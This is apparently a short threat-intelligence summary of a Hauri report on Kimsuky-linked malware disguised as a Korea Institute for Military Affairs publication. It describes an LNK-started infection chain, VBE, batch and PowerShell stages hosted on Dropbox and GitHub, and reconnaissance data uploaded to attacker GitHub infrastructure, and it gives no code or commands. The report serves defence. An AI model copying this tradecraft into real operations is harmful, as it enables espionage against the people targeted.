2026-06-29ììëìë³ê³_ìêµìÂìë³íì_ìëììíKimsukyì_ììì_ìì½ë.pdf (801 KB)

Kimsuky-linked malware masqueraded as a Korea Institute for Military Affairs monthly military and security publication, using a document-like LNK file to start a staged infection chain. Hauri observed Dropbox and GitHub being abused to host and deliver VBE, batch, and PowerShell components, with the final payload collecting system information, Downloads folder listings, and running process data before uploading results to attacker GitHub infrastructure. The report ties the public Music storage path and the GoogleUpdateTaskMachineUA-style scheduled task name to patterns previously seen in Kimsuky activity, indicating reconnaissance and persistence rather than immediate destructive impact.